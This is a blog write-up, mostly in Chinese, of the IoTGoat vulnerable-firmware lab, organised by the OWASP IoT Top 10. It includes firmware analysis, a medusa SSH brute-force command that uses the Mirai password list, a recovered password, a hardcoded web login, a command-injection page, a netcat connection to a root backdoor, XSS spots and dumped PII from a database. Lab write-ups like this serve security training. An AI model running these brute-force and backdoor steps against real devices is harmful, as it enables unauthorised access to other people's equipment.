IoTGoat

Posted by Mr.Be1ieVe on Tuesday, November 3, 2020

No 1: Weak, Guessable, or Hardcoded Passwords:

$ find . -name cgi-bin
./www/cgi-bin

查找,firmwalker

It will search through the extracted or mounted firmware file system for things of interest such as:

  • etc/shadow and etc/passwd
  • list out the etc/ssl directory
  • search for SSL related files such as .pem, .crt, etc.
  • search for configuration files
  • look for script files
  • search for other .bin files
  • look for keywords such as admin, password, remote, etc.
  • search for common web servers used on IoT devices
  • search for common binaries such as ssh, tftp, dropbear, etc.
  • search for URLs, email addresses and IP addresses
  • Experimental support for making calls to the Shodan API using the Shodan CLI
$ ./firmwalker.sh ../firmware/_IoTGoat-x86.img.extracted/squashfs-root/ ./IoTGoat.txt

/etc/shadow 保存了加密的真实密码

root:$1$Jl7H1VOG$Wgw2F/C.nLNTC.4pwDa4H1:
|                |
1                2

  1. Username : It is your login name.

  2. Password: It is your encrypted password. The password should be minimum 8-12 characters long including special characters, digits, lower case alphabetic and more. Usually password format is set to

    $id$salt$hashed, The$idis the algorithm used On GNU/Linux as follows:

    1. $1$ is MD5
    2. $2a$ is Blowfish
    3. $2y$is Blowfish
    4. $5$ is SHA-256
    5. $6$is SHA-512

    more

爆破密码

$ john --show ./etc/shadow
0 password hashes cracked, 2 left

hashcat也可以解密md5等,很强大但是我不大会用。。

medusa

Hydra, Medusa, or Ncrack都可以用来爆破

加上使用SecList

SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

使用命令awk '{print $2}' SecLists/Passwords/Malware/mirai-botnet.txt > SecLists/Passwords/Malware/mirai-botnet_passwords.txt来把密码部分导出到一个文件里

然后

$ medusa -u iotgoatuser -P ./SecLists/Passwords/Malware/mirai-botnet_passwords.txt -h 192.168.56.101 -M ssh

即可爆破到ssh的密码7ujMko0vizxv

No 2: Insecure Network Services:

kali@kali:~/Desktop/IoTGoat$ nmap -p20-6000 192.168.56.101
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-09 02:45 EST
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.0026s latency).
Not shown: 5973 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain                
80/tcp   open  http                                       110/tcp  open  pop3
443/tcp  open  https                                       5000/tcp open  upnp                                       5515/tcp open  unknown

ali@kali:~/Desktop/IoTGoat$ sudo nmap -sU -p20-6000 192.168.56.101 > ScanUdpResult.txt                         kali@kali:~/Desktop/IoTGoat$ cat ScanUdpResult.txt 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-09 03:20 EST                                                 Nmap scan report for 192.168.56.101 (192.168.56.101)       Host is up (0.00058s latency).                             Not shown: 5980 open|filtered ports                      PORT   STATE SERVICE                                       53/udp open  domain                                       Nmap done: 1 IP address (1 host up) scanned in 16.01 seconds

但是我的upnp好像不起作用,只能贴wp了

nmap -p5000 -sV 172.16.100.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 23:10 EDT
Nmap scan report for IoTGoat (172.16.100.213)
Host is up (0.00045s latency).

PORT     STATE SERVICE VERSION
5000/tcp open  upnp    MiniUPnP 2.1 (UPnP 1.1)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.80%I=7%D=5/4%Time=5EB0D91A%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,124,"\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/h
SF:tml\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20Ope
SF:nWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEA
SF:D><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Imple
SF:mented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20t
SF:his\x20server\.</BODY></HTML>\r\n")%r(GetRequest,117,"HTTP/1\.0\x20404\
SF:x20Not\x20Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\r
SF:\nContent-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x
SF:20MiniUPnPd/2\.1\r\n
[SNIP]
</TITLE></HEAD><BODY><H1>Not\x20Implemented<
SF:/H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x20
SF:server\.</BODY></HTML>\r\n");
MAC Address: 00:0C:29:00:AC:E7

Analyze the service detection response details and note information such as the service version (MiniUPnP 2.1), server version (OpenWrt 18.06.2), as well as the error code details. Proceed with interrogating each listening services with aggressive scripts that aid in vulnerability identification based on service versioning. Try searching for appropriate nmap scripts in Kali Linux under /usr/share/nmap/scripts directory. A upnp example using broadcast-upnp-info script is shown below.

nmap -sV --script=broadcast-upnp-info 172.16.100.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 23:39 EDT
Pre-scan script results:
| broadcast-upnp-info: 
|   239.255.255.250
|       Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|       Location: http://192.168.50.143:5000/rootDesc.xml
|         Webserver: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|         Name: OpenWRT router
|         Manufacturer: OpenWRT
|         Model Descr: OpenWRT router
|         Model Name: OpenWRT router
|         Model Version: 1
|         Name: WANDevice
|         Manufacturer: MiniUPnP
|         Model Descr: WAN Device
|         Model Name: WAN Device
|         Model Version: 20190130
|         Name: WANConnectionDevice
|         Manufacturer: MiniUPnP
|         Model Descr: MiniUPnP daemon
|         Model Name: MiniUPnPd
|_        Model Version: 20190130
[SNIP]
Nmap scan report for IoTGoat (192.168.50.143)
Host is up (0.00045s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Dropbear sshd (protocol 2.0)
53/tcp   open  domain   dnsmasq 2.73
80/tcp   open  http     LuCI Lua http config
443/tcp  open  ssl/http LuCI Lua http config
5000/tcp open  upnp     MiniUPnP 2.1 (UPnP 1.1)
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 134
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|     <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL was not found on this server.</BODY></HTML>
|   GenericLines: 
|     501 Not Implemented
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 149
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|     <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
|   HTTPOptions: 
[SNIP]

No 3: Insecure Ecosystem Interfaces:

隐藏的web shell

在web服务器config文件./etc/config/uhttpd可以看到lua_prefix

kali@kali:~/Desktop/IoTGoat/_IoTGoat-x86.img.extracted/squashfs-root$ cat ./etc/config/uhttpd | grep "/"
        option home             /www
        option cert             /etc/uhttpd.crt
        option key              /etc/uhttpd.key
        # Default is /cgi-bin
        option cgi_prefix       /cgi-bin
        list lua_prefix         "/cgi-bin/luci=/usr/lib/lua/luci/sgi/uhttpd.lua"

这个lua_prefix是用来跳转到对应文件的,可参考这里

然后在./usr/lib/lua/luci/可以看见

├───cbi
├───controller
│   ├───admin
│   └───iotgoat
│   ├───cbi
│   │   ├───admin_network
│   │   ├───admin_status
│   │   ├───admin_system
│   │   │   └───fstab
│   │   ├───firewall
│   │   └───upnp
│   └───network
├───sgi
├───sys
│   └───zoneinfo
├───template
├───tools
    ├───admin_network
    │   └───index
    ├───admin_system
    ├───admin_uci
    ├───cbi
    ├───firewall
    ├───iotgoat
        └───bootstrap

controller/iotgoat/iotgoat.lua中可以看到index函数

function index()
    entry({"admin", "iotgoat"}, firstchild(), "IoTGoat", 60).dependent=false
    entry({"admin", "iotgoat", "cmdinject"}, template("iotgoat/cmd"), "", 1)
    entry({"admin", "iotgoat", "cam"}, template("iotgoat/camera"), "Camera", 2)
    entry({"admin", "iotgoat", "door"}, template("iotgoat/door"), "Doorlock", 3)
    entry({"admin", "iotgoat", "webcmd"}, call("webcmd"))
end

view/iotgoat/里有cmd.html

所以访问https://<IoTGoat_IP>/cgi-bin/luci/admin/iotgoat/cmdinject即可

需要登陆密码,iotgoathardcodedpassword

在cmd中输入telnet -p 9999,linux nc即可连入

更多有关luci可以参考

luci框架-LUA的一个web框架使用

openwrt luci的wiki

后门

前面有个5515端口是未知的,nc连一下居然是后门。。

nc 192.168.56.102 5515
[***]Successfully Connected to IoTGoat's Backdoor[***]

ls
bin
boot
dev
dnsmasq_setup.sh
etc
lib
mnt
overlay
proc
rom
root
sbin
sys
tmp
usr
var
www

id
uid=0(root) gid=0(root)

XSS

Network/Firewall/Traffic Rules里

New forward rule 、 New source NAT 的Name 有XSS

快速了解:浅谈XSS攻击的那些事(附常用绕过姿势)

No 4: Lack of Secure Update Mechanism:

Insecure package update configuration defaults including CVE-2020-7982.

OPENWRT中的远程命令执行漏洞(CVE-2020-7982)[CN]

No 5: Use of Insecure or Outdated Components:

Several insecure and outdated software components with CVEs such as Dnsmasq, pppd, Linux Kernel, BusyBox, wpa_supplicant, and more.

Todo: auto scan

TLS 1.2

ssh 2.0

pppd 2.4.7

Dnsmasq 2.73

wpa_supplicant v2.7-devel

BusyBox v1.28.4

No 6: Insufficient Privacy Protection:

PII data captured and stored insecurely.

Personally identifiable information (PII)

firmwalker搜索的db文件

##################################### *.db
/usr/lib/lua/luci/controller/iotgoat/sensordata.db

然后使用sqlite3

kali@kali:~/Desktop/IoTGoat/_IoTGoat-x86.img.extracted/squashfs-root/usr/lib/lua/luci/controller/iotgoat$ sqlite3 sensordata.db 
SQLite version 3.32.3 2020-06-18 14:00:33
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE sensors(id INTEGER PRIMARY KEY AUTOINCREMENT, temperature NUMERIC, humidity NUMERIC, currentdate DATE, currentime TIME, name TEXT, email TEXT, birthdate NUMERIC);
INSERT INTO sensors VALUES(1,22.399999999999998579,68,'2020-03-24','18:56:33','johnsmith','johnsmith@gmail.com',1311977);
INSERT INTO sensors VALUES(2,29.699999999999999289,98,'2020-03-24','18:56:43','jillsmith','jillsmith@gmail.com',4141979);
INSERT INTO sensors VALUES(3,31.199999999999999289,28,'2020-03-24','18:57:05','walter','waltergary@yopmail.com',32821969);
INSERT INTO sensors VALUES(4,16.899999999999998578,38,'2020-03-24','18:57:20','WilliamRonald','billronald@yopmail.com',11141989);
INSERT INTO sensors VALUES(5,35,78,'2020-03-24','18:58:04','Test','TstUser@aol.com',12121990);
INSERT INTO sensors VALUES(6,35,88,'2020-03-24','18:58:18','Sgt','sgtmajor@us.gov',10171956);
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('sensors',6);
COMMIT;
sqlite>

No 7: Insecure Data Transfer and Storage:

<IP>/cgi-bin/luci/admin/network/wireless/wl0.network1

wifi没有密码

No 8: Lack of Device Management:

<IP>/cgi-bin/luci/admin/status/syslog没有开启

No 9: Insecure Default Settings:

Many included in IoTGoat such as missing secure headers to prevent framing as well as CSRF protections on sensitive requests.

检测CSRF漏洞是一项比较繁琐的工作,最简单的方法就是抓取一个正常请求的数据包,去掉Referer字段后再重新提交,如果该提交还有效,那么基本上可以确定存在CSRF漏洞。

​ 目前防御 CSRF 攻击主要有三种策略:验证 HTTP Referer 字段;在请求地址中添加 token 并验证;在 HTTP 头中自定义属性并验证。

link

No 10: Lack of Physical Hardening:

物理强化,应该是指对固件的保护

「真诚赞赏,手留余香」

Mr.Be1ieVe's Treasure

真诚赞赏,手留余香

使用微信扫描二维码完成支付

CATALOG
    FEATURED TAGS
    awd buu ctf hackthebox linux使用 xray 专业学习 基础知识 学习笔记